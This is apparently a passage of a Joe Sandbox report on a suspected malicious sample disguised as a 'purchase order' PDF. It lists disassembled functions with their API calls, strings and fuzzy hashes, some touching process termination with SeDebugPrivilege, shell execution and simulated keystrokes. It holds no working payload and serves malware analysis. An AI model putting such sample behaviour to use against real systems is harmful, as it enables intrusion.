Part of subcall function 008C7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008C758C,80070057,?,?), ref: 008C7698
Part of subcall function 008C7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008C758C,80070057,?), ref: 008C76A8

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 008E9B1B
_memset.LIBCMT ref: 008E9B28
_memset.LIBCMT ref: 008E9C6B
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 008E9C97
CoTaskMemFree.OLE32(?), ref: 008E9CA2

Strings

NULL Pointer assignment, xrefs: 008E9CF0

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: e73a8e5988304b00cb79b04a3cb211ff4443bf62fcf6d511f5c5312d48f8f132
Instruction ID: 3965465fe2cecafba7a5d08354440c7e51216596340c2114023614b00d478879
Opcode Fuzzy Hash: e73a8e5988304b00cb79b04a3cb211ff4443bf62fcf6d511f5c5312d48f8f132
Instruction Fuzzy Hash: 07911871D00229ABDB10DFA5DC84EDEBBB9FF09710F20816AE519E7241DB719A44CFA1

Function 008F6FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 008F7093
SendMessageW.USER32(?,00001036,00000000,?), ref: 008F70A7
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 008F70C1
_wcscat.LIBCMT ref: 008F711C
SendMessageW.USER32(?,00001057,00000000,?), ref: 008F7133
SendMessageW.USER32(?,00001061,?,0000000F), ref: 008F7161

Strings

SysListView32, xrefs: 008F7065

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: d84298b303b52ac1ce4c277127f6129cfb6aba58b73df05c753b2c79052d43ce
Instruction ID: 324bc71a72d3401c844d784a13b039db3100d203525723502b8e69fd14eaacd1
Opcode Fuzzy Hash: d84298b303b52ac1ce4c277127f6129cfb6aba58b73df05c753b2c79052d43ce
Instruction Fuzzy Hash: 36416F71A0430CABEB219F74CC85BFA77E8FF48354F10456AF649E6292D6719D84CB60

Function 008EEC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 008D3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 008D3EB6
Part of subcall function 008D3E91: Process32FirstW.KERNEL32(00000000,?), ref: 008D3EC4
Part of subcall function 008D3E91: CloseHandle.KERNEL32(00000000), ref: 008D3F8E

OpenProcess.KERNEL32(00000001,00000000,?), ref: 008EECB8
GetLastError.KERNEL32 ref: 008EECCB
OpenProcess.KERNEL32(00000001,00000000,?), ref: 008EECFA
TerminateProcess.KERNEL32(00000000,00000000), ref: 008EED77
GetLastError.KERNEL32(00000000), ref: 008EED82
CloseHandle.KERNEL32(00000000), ref: 008EEDB7

Strings

SeDebugPrivilege, xrefs: 008EECD6

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 3407c494aac5e58a022fa73a5282a5ba5a63d213c9e8fcf1edaeabdb55e396ed
Instruction ID: 610ed45e225ca4638c8d3d5dba35f3bcd562704a91579835c29e10cd9570dcab
Opcode Fuzzy Hash: 3407c494aac5e58a022fa73a5282a5ba5a63d213c9e8fcf1edaeabdb55e396ed
Instruction Fuzzy Hash: 6C4177712002119FDB15EF28CC95F6AB7A1FF81714F088069FA86DB282DB75E854CB96

Function 008D3226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 008D32C5

Strings

blank, xrefs: 008D3247
question, xrefs: 008D327E
info, xrefs: 008D3266
warning, xrefs: 008D32AE
stop, xrefs: 008D3296

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: ad78538a8d2602eb1aa34ea4dcbdcad039c1f8891a27978a76e4b0fb788183a3
Instruction ID: 81b27db42d720a5cde63d21ec8b2fd77503d74af27c7bc873c6df9fb4af17c7f
Opcode Fuzzy Hash: ad78538a8d2602eb1aa34ea4dcbdcad039c1f8891a27978a76e4b0fb788183a3
Instruction Fuzzy Hash: 2E11EB32A48356BB9B017A54EC42C6BB39CFF19375F20012BF504E6382D6659B4046A7

Function 008D4534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 008D454E
LoadStringW.USER32(00000000), ref: 008D4555
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 008D456B
LoadStringW.USER32(00000000), ref: 008D4572
_wprintf.LIBCMT ref: 008D4598
MessageBoxW.USER32(00000000,?,?,00011010), ref: 008D45B6

Strings

%s (%d) : ==> %s: %s %s, xrefs: 008D4593

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 126623b52ac1de0a1bd08360f56451c9701f3efd1c5673691bd13e3342700105
Instruction ID: f4a7b86082460cfa1a3e910462a7a808aa3f1d81fa15e6c4a2926bbfbddfdafb
Opcode Fuzzy Hash: 126623b52ac1de0a1bd08360f56451c9701f3efd1c5673691bd13e3342700105
Instruction Fuzzy Hash: 290162F2900208BFE711ABA4DD89EFB776CFF08301F0005A6BB45D2152EA749E858B75

Function 008FD74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00872612: GetWindowLongW.USER32(?,000000EB), ref: 00872623

GetSystemMetrics.USER32(0000000F), ref: 008FD78A
GetSystemMetrics.USER32(0000000F), ref: 008FD7AA
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 008FD9E5
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 008FDA03
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 008FDA24
ShowWindow.USER32(00000003,00000000), ref: 008FDA43
InvalidateRect.USER32(?,00000000,00000001), ref: 008FDA68
DefDlgProcW.USER32(?,00000005,?,?), ref: 008FDA8B

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 2cbf569a3f6423f955b035d71775c08956271b981b5d969aa8104230ba4a7e56
Instruction ID: ad44d7a60035ac62621d9d20855bd9af5d2e0814af4f012fb62a791208effdc3
Opcode Fuzzy Hash: 2cbf569a3f6423f955b035d71775c08956271b981b5d969aa8104230ba4a7e56
Instruction Fuzzy Hash: 75B16871600229ABDF14CF78C985BBD7BB2FF48701F088169EE48DA296D774A950CB60

Function 00872A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,008AC417,00000004,00000000,00000000,00000000), ref: 00872ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,008AC417,00000004,00000000,00000000,00000000,000000FF), ref: 00872B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,008AC417,00000004,00000000,00000000,00000000), ref: 008AC46A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,008AC417,00000004,00000000,00000000,00000000), ref: 008AC4D6

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: ec851bc5283bde88079255b6373fe8fb67147e5cf6820500f1aa2f49200d1341
Instruction ID: 0a0084a2f16177850e8be36cb7efac4fae07f1412f2b461f3ace26a8b2e8de9b
Opcode Fuzzy Hash: ec851bc5283bde88079255b6373fe8fb67147e5cf6820500f1aa2f49200d1341
Instruction Fuzzy Hash: 4C415730608794AAD7358B388C99B7ABB92FF9A314F28C81DE14FC6979C634D881D714

Function 008D7368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 008D737F

Part of subcall function 00890FF6: std::exception::exception.LIBCMT ref: 0089102C
Part of subcall function 00890FF6: __CxxThrowException@8.LIBCMT ref: 00891041

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 008D73B6
EnterCriticalSection.KERNEL32(?), ref: 008D73D2
_memmove.LIBCMT ref: 008D7420
_memmove.LIBCMT ref: 008D743D
LeaveCriticalSection.KERNEL32(?), ref: 008D744C
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 008D7461
InterlockedExchange.KERNEL32(?,000001F6), ref: 008D7480

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 7ff547b9894a8df4d223285bc6e42b976b96e28d870520b7e32a12d8afd25d7f
Instruction ID: 7a8ce568316890b495870d21f1da3c06f165b2a3b652a4e42bdbcd987091e9c5
Opcode Fuzzy Hash: 7ff547b9894a8df4d223285bc6e42b976b96e28d870520b7e32a12d8afd25d7f
Instruction Fuzzy Hash: C0317031904205EBCF10EF68DC85EAE7BB8FF44710B1441A6FA04EB246DB319A50DBA5

Function 008F6442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 008F645A
GetDC.USER32(00000000), ref: 008F6462
GetDeviceCaps.GDI32(00000000,0000005A), ref: 008F646D
ReleaseDC.USER32(00000000,00000000), ref: 008F6479
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 008F64B5
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 008F64C6
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,008F9299,?,?,000000FF,00000000,?,000000FF,?), ref: 008F6500
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 008F6520

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 6b0987f3e825eee0e71c4bcbb93077550a985032ee29e5c6f7931db7be9273b8
Instruction ID: 4c7ca7bf046509754b33654d8ea1f4b3afc38d455e542126b474192b88d85599
Opcode Fuzzy Hash: 6b0987f3e825eee0e71c4bcbb93077550a985032ee29e5c6f7931db7be9273b8
Instruction Fuzzy Hash: 6F317E72100214BFEB118F20CC89FBA3BA9FF19761F040065FF08EA192D6759851CB74

Function 008CC072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 008CC087
_memcmp.LIBCMT ref: 008CC0A9
_memcmp.LIBCMT ref: 008CC0C1
_memcmp.LIBCMT ref: 008CC0D4
_memcmp.LIBCMT ref: 008CC0EE
_memcmp.LIBCMT ref: 008CC101
_memcmp.LIBCMT ref: 008CC119
_memcmp.LIBCMT ref: 008CC134

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 5e603a8659d3bd30accece2f58e080badfb25ee5a9af9d2811ca82f8e6afae8a
Instruction ID: f6a14b869ff0aaad79c033711b35b795819402e1f2ed272ed1c90b32f67f7efc
Opcode Fuzzy Hash: 5e603a8659d3bd30accece2f58e080badfb25ee5a9af9d2811ca82f8e6afae8a
Instruction Fuzzy Hash: 2621DD62A04616BBDA52B6254C4AF6F33BCFF60398F0C4019FE0DD62C2E771DD1181A6

Function 008DED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00879997: __itow.LIBCMT ref: 008799C2
Part of subcall function 00879997: __swprintf.LIBCMT ref: 00879A0C

Part of subcall function 0088FEC6: _wcscpy.LIBCMT ref: 0088FEE9

_wcstok.LIBCMT ref: 008DEEFF
_wcscpy.LIBCMT ref: 008DEF8E
_memset.LIBCMT ref: 008DEFC1

Strings

X, xrefs: 008DEFFE

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 8c6604abe5703cfc1c440921d6942cf340b5eaf0a2c01b6573b40ffeb7eb1cb9
Instruction ID: eec5ee7ab587fdb5ea054a8d408aeeda6a762cee1b97bb06e9788c5d322277fa
Opcode Fuzzy Hash: 8c6604abe5703cfc1c440921d6942cf340b5eaf0a2c01b6573b40ffeb7eb1cb9
Instruction Fuzzy Hash: 03C12C715087409FCB15EF28C881A5AB7E4FF85310F14896DF99ADB2A2DB70E945CB82

Function 00871424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5d1b19ed2efeda3bbd39abed0c8c3a0c0f76b00045025b6084bdf1ee6387d76
Instruction ID: 681fff54dbe25ee04c8501cc459448e9c968d9684cc5b0b76c15b25c2d4f37a5
Opcode Fuzzy Hash: a5d1b19ed2efeda3bbd39abed0c8c3a0c0f76b00045025b6084bdf1ee6387d76
Instruction Fuzzy Hash: E8715730900109EFDF148F98C888EBEBB79FF86314F14C159E919EA656D734AA51CBA4

Function 008E6E8A Relevance: 10.7, APIs: 7, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c289ae40dfaa40b471ffdd5fbba4edccb1eb9e794ae692de544aa9918a89f0d4
Instruction ID: 1b3d66350a5a8dc43f9731982031e72e7f55e6b70b6bbbfbec60f1410031111b
Opcode Fuzzy Hash: c289ae40dfaa40b471ffdd5fbba4edccb1eb9e794ae692de544aa9918a89f0d4
Instruction Fuzzy Hash: BF61AB72508740ABC710EB29CC85E6FB7A9FF85714F14892DF649D72A2DA70DD00CB92

Function 008FB60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(01226E10), ref: 008FB6A5
IsWindowEnabled.USER32(01226E10), ref: 008FB6B1
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 008FB795
SendMessageW.USER32(01226E10,000000B0,?,?), ref: 008FB7CC
IsDlgButtonChecked.USER32(?,?), ref: 008FB809
GetWindowLongW.USER32(01226E10,000000EC), ref: 008FB82B
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 008FB843

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 834f12f4f08cd5b7e63a3f8b6074e6a584577f64af8858c83dcbcb78ceca6472
Instruction ID: ff2827f7b4245d4440de681b4f4e98112bf264dc4e45192f6f41ba9c600bc096
Opcode Fuzzy Hash: 834f12f4f08cd5b7e63a3f8b6074e6a584577f64af8858c83dcbcb78ceca6472
Instruction Fuzzy Hash: 06718A34604208AFDB20AF74C894FBA7BF9FF99340F244069EA56D72A1D735A851CF50

Function 008EF732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 008EF75C
_memset.LIBCMT ref: 008EF825
ShellExecuteExW.SHELL32(?), ref: 008EF86A

Part of subcall function 00879997: __itow.LIBCMT ref: 008799C2
Part of subcall function 00879997: __swprintf.LIBCMT ref: 00879A0C

Part of subcall function 0088FEC6: _wcscpy.LIBCMT ref: 0088FEE9

GetProcessId.KERNEL32(00000000), ref: 008EF8E1
CloseHandle.KERNEL32(00000000), ref: 008EF910

Strings

@, xrefs: 008EF839

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 539510619577495cd3503a181014697300e779741d71adf7ef9ee71c7bc35fb0
Instruction ID: 8da1dfeda041c546563077a7e75a90bfeff021270196dbab67e654b2a40e55e2
Opcode Fuzzy Hash: 539510619577495cd3503a181014697300e779741d71adf7ef9ee71c7bc35fb0
Instruction Fuzzy Hash: 33617E75A006699FCF14EF59C480AAEBBF5FF49310B148469E959EB352CB30ED40CB91

Function 008D145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 008D149C
GetKeyboardState.USER32(?), ref: 008D14B1
SetKeyboardState.USER32(?), ref: 008D1512
PostMessageW.USER32(?,00000101,00000010,?), ref: 008D1540
PostMessageW.USER32(?,00000101,00000011,?), ref: 008D155F
PostMessageW.USER32(?,00000101,00000012,?), ref: 008D15A5
PostMessageW.USER32(?,00000101,0000005B,?), ref: 008D15C8

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: e0974e5f09cab91803c5a1b7bea83567b2f8882ced91d2dcb1ecadc88e303563
Instruction ID: e97b27a1fd509ccbfbe83dce018c16ba6cb485428fff4a979b88a1d32f0afcad
Opcode Fuzzy Hash: e0974e5f09cab91803c5a1b7bea83567b2f8882ced91d2dcb1ecadc88e303563
Instruction Fuzzy Hash: C551F3A06042D53DFF3646349C49BBA7FAABF46304F08468AE1D5C5AD2C798EC84D750

Function 008D1276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 008D12B5
GetKeyboardState.USER32(?), ref: 008D12CA
SetKeyboardState.USER32(?), ref: 008D132B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 008D1357
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 008D1374
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 008D13B8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 008D13D9

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

